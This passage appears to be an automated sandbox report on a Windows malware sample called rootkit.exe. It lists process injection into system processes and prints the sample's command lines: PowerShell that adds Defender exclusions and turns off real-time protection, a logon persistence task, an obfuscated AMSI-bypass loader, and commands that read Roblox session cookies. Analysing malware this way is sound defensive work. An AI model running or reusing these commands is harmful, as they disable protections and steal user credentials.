N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3604 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 3604 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
PID 3604 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 3604 wrote to memory of 4260 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Users\Admin\AppData\Local\Temp\Modify.exe
PID 3604 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3604 wrote to memory of 972 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3604 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 3604 wrote to memory of 4324 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\Windows\System32\schtasks.exe
PID 3604 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 3604 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 3604 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\rootkit.exe C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
PID 4260 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 2808 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 4612 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 3364 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 2808 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 3048 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4260 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 4260 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\Modify.exe C:\Windows\System32\Wbem\wmic.exe
PID 2808 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 4864 N/A C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3688 wrote to memory of 3652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3652 wrote to memory of 616 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3652 wrote to memory of 672 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3652 wrote to memory of 952 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 64 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3652 wrote to memory of 736 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 896 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3652 wrote to memory of 1112 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3652 wrote to memory of 1164 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3652 wrote to memory of 1172 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1180 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1252 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1304 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1316 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1424 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1456 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1520 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1528 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3652 wrote to memory of 1668 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3652 wrote to memory of 1676 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\rootkit.exe

"C:\Users\Admin\AppData\Local\Temp\rootkit.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

"C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"

C:\Users\Admin\AppData\Local\Temp\Modify.exe

"C:\Users\Admin\AppData\Local\Temp\Modify.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

"C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AwSxkPIJJAyW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$viULjJaneOFgoE,[Parameter(Position=1)][Type]$HywweUOfax)$tcpewosFoPt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+'D'+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+'S'+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+','+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+'A'+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$tcpewosFoPt.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+'lN'+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+'ide'+[Char](66)+''+'y'+''+'S'+''+'i'+''+'g'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$viULjJaneOFgoE).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+'m'+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');$tcpewosFoPt.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+'',$HywweUOfax,$viULjJaneOFgoE).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $tcpewosFoPt.CreateType();}$PkCrCYpVPEuKw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+[Char](46)+''+'W'+''+'i'+''+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+''+[Char](110)+'s'+'a'+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+'e'+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$vNVfOFPjvzWEJI=$PkCrCYpVPEuKw.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KjvmLkEQFcFpsjShEBs=AwSxkPIJJAyW @([String])([IntPtr]);$CLXCaaVPhbfuYmEIXCeBDV=AwSxkPIJJAyW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dxhAEsDBBvF=$PkCrCYpVPEuKw.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+'3'+'2'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')));$zFuiQgIysvDznc=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$dxhAEsDBBvF,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$wiFExwGurkYEtfwsM=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$dxhAEsDBBvF,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+''+'P'+'r'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$pAuXrxr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zFuiQgIysvDznc,$KjvmLkEQFcFpsjShEBs).Invoke(''+'a'+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$rCCUSlwRveMBzKVBr=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$pAuXrxr,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+'er')));$JRAIIKrGLL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wiFExwGurkYEtfwsM,$CLXCaaVPhbfuYmEIXCeBDV).Invoke($rCCUSlwRveMBzKVBr,[uint32]8,4,[ref]$JRAIIKrGLL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rCCUSlwRveMBzKVBr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wiFExwGurkYEtfwsM,$CLXCaaVPhbfuYmEIXCeBDV).Invoke($rCCUSlwRveMBzKVBr,[uint32]8,0x20,[ref]$JRAIIKrGLL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](119)+'ww'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'

C:\Windows\System32\Wbem\wmic.exe

